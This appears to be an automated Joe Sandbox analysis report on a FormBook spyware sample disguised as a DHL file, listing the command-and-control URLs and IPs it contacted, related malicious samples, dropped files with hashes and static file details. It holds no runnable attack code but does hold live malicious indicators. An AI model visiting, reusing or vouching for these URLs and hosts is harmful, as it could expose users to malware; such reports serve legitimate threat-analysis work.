                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/8mlm/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.dating-apps-az-dn5.xyz/tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ana-silverco.shop/ez1t/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.egyshare.xyz/440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.t19yd.top/sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.atendefacil.info/gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bloodbalancecaps.shop/qimy/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.happyjam.life/4ii9/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sitioseguro.blog/k4tn/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sitioseguro.blog/k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.whisperart.net/27s6/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ana-silverco.shop/ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.happyjam.life/4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.samundri.online/3ifu/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.whisperart.net/27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.atendefacil.info/gua3/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.remedies.pro/8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.t19yd.top/sa1b/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dating-apps-az-dn5.xyz/tskk/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabregini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://kb.fastpanel.direct/troubleshoot/regini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.00000000049C8000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000040A8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6regini.exe, 00000006.00000002.4819056247.0000000005010000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000046F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.comregini.exe, 00000006.00000002.4821060056.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004B5A000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000006.00000002.4819056247.0000000004CEC000.00000004.10000000.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.00000000043CC000.00000004.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000002.4817531930.000000000423A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.bloodbalancecaps.shopRsbLJIqaDYs.exe, 00000007.00000002.4819665494.00000000051EF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 00000006.00000003.2955752351.000000000794D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            13.248.169.48
                                                                            		www.remedies.proUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            209.74.77.107
                                                                            		www.happyjam.lifeUnited States
                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                            108.179.253.197
                                                                            		bloodbalancecaps.shopUnited States
                                                                            		46606UNIFIEDLAYER-AS-1UStrue
                                                                            38.47.207.164
                                                                            		t19yd.topUnited States
                                                                            		174COGENT-174UStrue
                                                                            199.59.243.227
                                                                            		www.whisperart.netUnited States
                                                                            		395082BODIS-NJUStrue
                                                                            84.32.84.32
                                                                            		appsolucao.shopLithuania
                                                                            		33922NTT-LT-ASLTtrue
                                                                            172.67.162.39
                                                                            		www.sitioseguro.blogUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            104.21.90.137
                                                                            		www.ana-silverco.shopUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            208.115.225.220
                                                                            		www.atendefacil.infoUnited States
                                                                            		46475LIMESTONENETWORKSUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1570251
                                                                            Start date and time:2024-12-06 17:34:10 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 25s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:DHL_734825510.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@15/9
                                                                            EGA Information:
                                                                            • Successful, ratio: 66.7%
                                                                            HCA Information:
                                                                            • Successful, ratio: 86%
                                                                            • Number of executed functions: 54
                                                                            • Number of non-executed functions: 318
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: DHL_734825510.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            11:36:16API Interceptor9817440x Sleep call for process: regini.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            13.248.169.48purchase order.exeGet hashmaliciousFormBookBrowse
                                                                            • www.aktmarket.xyz/wb7v/
                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • www.avalanchefi.xyz/vxa5/
                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                            • www.remedies.pro/4azw/
                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                            • www.smartgov.shop/1cwp/
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • www.egyshare.xyz/440l/
                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                            • www.aktmarket.xyz/wb7v/
                                                                            YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                            • www.tals.xyz/k1td/
                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                            • www.optimismbank.xyz/98j3/
                                                                            lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                            • www.avalanchefi.xyz/ctta/
                                                                            209.74.77.107SRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • www.liveplah.live/2bf0/
                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gadgetre.info/8q8w/
                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                            • www.learnwithus.site/alu5/
                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                            • www.learnwithus.site/alu5/
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • www.happyjam.life/4ii9/
                                                                            quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • www.gadgetre.info/8q8w/
                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.beyondfitness.live/fbpt/
                                                                            specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.gadgetre.info/8q8w/
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • www.learnwithus.site/alu5/
                                                                            ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.gadgetre.info/8q8w/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.remedies.proSRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                            • 13.248.169.48
                                                                            www.whisperart.netSW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            www.sitioseguro.blogSW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.15.100
                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.162.39
                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.162.39
                                                                            5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.15.100
                                                                            www.ana-silverco.shopUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.156.195
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.156.195
                                                                            quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.90.137
                                                                            specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 104.21.90.137
                                                                            ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 104.21.90.137
                                                                            www.dating-apps-az-dn5.xyzInvoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            MULTIBAND-NEWHOPEUSSRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.109
                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 209.74.77.109
                                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.79.42
                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.79.42
                                                                            quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.77.107
                                                                            UNIFIEDLAYER-AS-1USShipping Documents 72908672134.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 192.254.186.165
                                                                            #U25b6#Ufe0fPlayVoiceMessage9266.emlGet hashmaliciousUnknownBrowse
                                                                            • 192.185.77.66
                                                                            main_spc.elfGet hashmaliciousMiraiBrowse
                                                                            • 173.254.73.204
                                                                            https://track-004.blogspot.comGet hashmaliciousUnknownBrowse
                                                                            • 50.87.184.136
                                                                            https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                            • 192.254.190.193
                                                                            aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.241.62.63
                                                                            0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 50.87.144.157
                                                                            8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 50.87.218.140
                                                                            #U25b6#Ufe0fPlayVoiceMessage9312.emlGet hashmaliciousUnknownBrowse
                                                                            • 192.185.77.66
                                                                            tmp667.HtML.htmlGet hashmaliciousUnknownBrowse
                                                                            • 50.116.87.59
                                                                            COGENT-174USALFq7XP17d.lnkGet hashmaliciousUnknownBrowse
                                                                            • 170.75.168.151
                                                                            jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 38.238.232.202
                                                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                            • 38.220.172.124
                                                                            i586.elfGet hashmaliciousUnknownBrowse
                                                                            • 38.59.39.1
                                                                            i686.elfGet hashmaliciousUnknownBrowse
                                                                            • 167.141.201.7
                                                                            main_spc.elfGet hashmaliciousMiraiBrowse
                                                                            • 38.1.199.97
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 38.92.8.103
                                                                            pn866G3CCj.lnkGet hashmaliciousUnknownBrowse
                                                                            • 170.75.168.151
                                                                            QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                                            • 206.238.89.119
                                                                            vZAhXkWkDT.lnkGet hashmaliciousUnknownBrowse
                                                                            • 170.75.168.151
                                                                            AMAZON-02UShttps://app.droplet.io/form/K47rYNGet hashmaliciousUnknownBrowse
                                                                            • 3.21.252.22
                                                                            Platinum Hall County, Georgia Proposal (16.6 KB).docxGet hashmaliciousKnowBe4Browse
                                                                            • 108.139.79.89
                                                                            mipsel.elfGet hashmaliciousGafgytBrowse
                                                                            • 54.171.230.55
                                                                            i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                            • 54.217.10.153
                                                                            https://www.schneiderpostaccident.comGet hashmaliciousUnknownBrowse
                                                                            • 52.66.117.206
                                                                            i686.elfGet hashmaliciousUnknownBrowse
                                                                            • 54.171.230.55
                                                                            .akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                            • 3.187.21.27
                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 54.171.230.55
                                                                            roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            • 34.249.145.219
                                                                            jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 35.166.239.241

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\174EBI30

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\regini.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1220068301579391
                                                                            Encrypted:false
                                                                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8JoudpfjOLl:aq+n0E9ELyKOMq+8qu3SJ
                                                                            MD5:87EE0BBB38B11E14090EF60A7D56C8B1
                                                                            SHA1:37966F94007814B687989937B4A299FA816581ED
                                                                            SHA-256:22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
                                                                            SHA-512:37572D4B5A336BC8220B9CF64F8F2D6041C68A449C582221C5C62A3BA1D8D4CA5C241C9383038EBF3D2787CF4AB9F7370E1A3C4AC7D6EC0A942FC41CD7917266
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\Cocles

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DHL_734825510.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.991894448424248
                                                                            Encrypted:true
                                                                            SSDEEP:6144:8+2YOa0VFsJf/TJVUb3WGu2kUTVrpyDnu:P2u00V/TJO3WGdPTVrCu
                                                                            MD5:180B2D2C57AD92BC6AC58242CC078E4C
                                                                            SHA1:5C7252D2702CC78C3DD750BEFB258DA2768FA09A
                                                                            SHA-256:09B54E20D985136638D79737FD41E2543607B44409857798A3E4FD5372766B33
                                                                            SHA-512:86C9EC1A1C22FC3FD64B4F9AA266CF4AB276B42CF05C7188D4908426F6496469A7BADA9D7BA61776E2082DDEFFDF1F9F49673D7B77C06155C6A2FFE5AA39FA88
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...B5WOG0QYA..6W.G4QYAQBvWOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4Q.AQB8H.I4.P.p.7..f`902q2D8(5U<y"0,X8;gV4y3$,.>!gp..a<-R2aJ9[}AQB6WOGMPP.l"Q.r'S.d!6.,...1>.K.s'S.C....7(.f8:)l"Q.OG4QYAQBf.OGxPXA.&i5OG4QYAQB.WMF?PRAQ.2WOG4QYAQB.COG4AYAQ22WOGtQYQQB6UOG2QYAQB6WIG4QYAQB6'KG4SYAQB6WMGt.YAAB6GOG4QIAQR6WOG4QIAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYA.6S/;G4Qm.UB6GOG4.]AQR6WOG4QYAQB6WOG.QY!QB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4Q

                                                                            C:\Users\user\AppData\Local\Temp\aut5BF.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\DHL_734825510.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.991894448424248
                                                                            Encrypted:true
                                                                            SSDEEP:6144:8+2YOa0VFsJf/TJVUb3WGu2kUTVrpyDnu:P2u00V/TJO3WGdPTVrCu
                                                                            MD5:180B2D2C57AD92BC6AC58242CC078E4C
                                                                            SHA1:5C7252D2702CC78C3DD750BEFB258DA2768FA09A
                                                                            SHA-256:09B54E20D985136638D79737FD41E2543607B44409857798A3E4FD5372766B33
                                                                            SHA-512:86C9EC1A1C22FC3FD64B4F9AA266CF4AB276B42CF05C7188D4908426F6496469A7BADA9D7BA61776E2082DDEFFDF1F9F49673D7B77C06155C6A2FFE5AA39FA88
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...B5WOG0QYA..6W.G4QYAQBvWOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4Q.AQB8H.I4.P.p.7..f`902q2D8(5U<y"0,X8;gV4y3$,.>!gp..a<-R2aJ9[}AQB6WOGMPP.l"Q.r'S.d!6.,...1>.K.s'S.C....7(.f8:)l"Q.OG4QYAQBf.OGxPXA.&i5OG4QYAQB.WMF?PRAQ.2WOG4QYAQB.COG4AYAQ22WOGtQYQQB6UOG2QYAQB6WIG4QYAQB6'KG4SYAQB6WMGt.YAAB6GOG4QIAQR6WOG4QIAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYA.6S/;G4Qm.UB6GOG4.]AQR6WOG4QYAQB6WOG.QY!QB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4QYAQB6WOG4Q

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                            Entropy (8bit):7.952667114471218
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                            • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                            • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:DHL_734825510.exe
                                                                            File size:743'936 bytes
                                                                            MD5:3aae187307a535df90ed8f9faa0341d2
                                                                            SHA1:c3288325246f98f3e388795f7d34d4ce4a8adb08
                                                                            SHA256:00c2d72b6a63a14fbe34e3fb19fad396213bb9be21ff695df527a676b866c8b2
                                                                            SHA512:985ecdf46ebc1b0dde826041bcb0d766f56ccb883c9ea17e44c9eee365789a1756cb04332474cba8893d833544296cd3ea79796c407f9bd94cf5ad89f52b7447
                                                                            SSDEEP:12288:9quErHF6xC9D6DmR1J98w4oknqOOCyQfF5JZPuph9QMbbTDMFgS1zv4ptuF/YXSA:grl6kD68JmlotQfp9m9lbxa4yFwAq
                                                                            TLSH:EBF423898285D9B6C71463754429CDC48A74B4728ECD678F8328FA2FFC21353ED6BA5C
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                            File Icon

